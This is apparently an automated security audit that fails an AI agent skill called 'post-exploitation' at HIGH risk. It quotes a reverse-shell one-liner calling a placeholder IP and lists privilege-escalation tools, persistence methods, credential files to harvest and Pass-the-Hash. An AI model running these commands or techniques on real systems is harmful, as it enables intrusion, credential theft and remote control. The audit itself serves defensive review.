post-exploitation

Fail

Audited by Gen Agent Trust Hub on Jul 31, 2026

Risk Level: HIGHCOMMAND_EXECUTIONCREDENTIALS_UNSAFEDATA_EXFILTRATIONREMOTE_CODE_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill provides functional one-liners for establishing reverse shells (e.g., bash -i >& /dev/tcp/IP/4444 0>&1) and upgrading them to interactive PTY shells using Python.
  • [PRIVILEGE_ESCALATION]: The instructions detail numerous methods for gaining elevated permissions, including exploiting SUID binaries, Docker group memberships, and using Windows-specific escalation tools like PrintSpoofer and GodPotato.
  • [PERSISTENCE_MECHANISMS]: The skill outlines several ways to maintain access to a compromised system, such as modifying cron jobs, systemd timers, SSH authorized_keys, and Windows Registry Run keys.
  • [DATA_EXPOSURE_AND_EXFILTRATION]: The skill directs the agent to harvest credentials from sensitive locations including .bash_history, .my.cnf, .netrc, and .git-credentials, and describes Pass-the-Hash techniques for lateral movement.
  • [UNVERIFIABLE_DEPENDENCIES_AND_REMOTE_CODE_EXECUTION]: The skill references a wide array of third-party offensive tools (LinPEAS, Mimikatz, Sliver, Havoc, chisel, etc.) which are typically downloaded and executed to facilitate exploitation and Command & Control (C2) operations.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Jul 31, 2026, 01:37 AM
Security Audit — agent-trust-hub — post-exploitation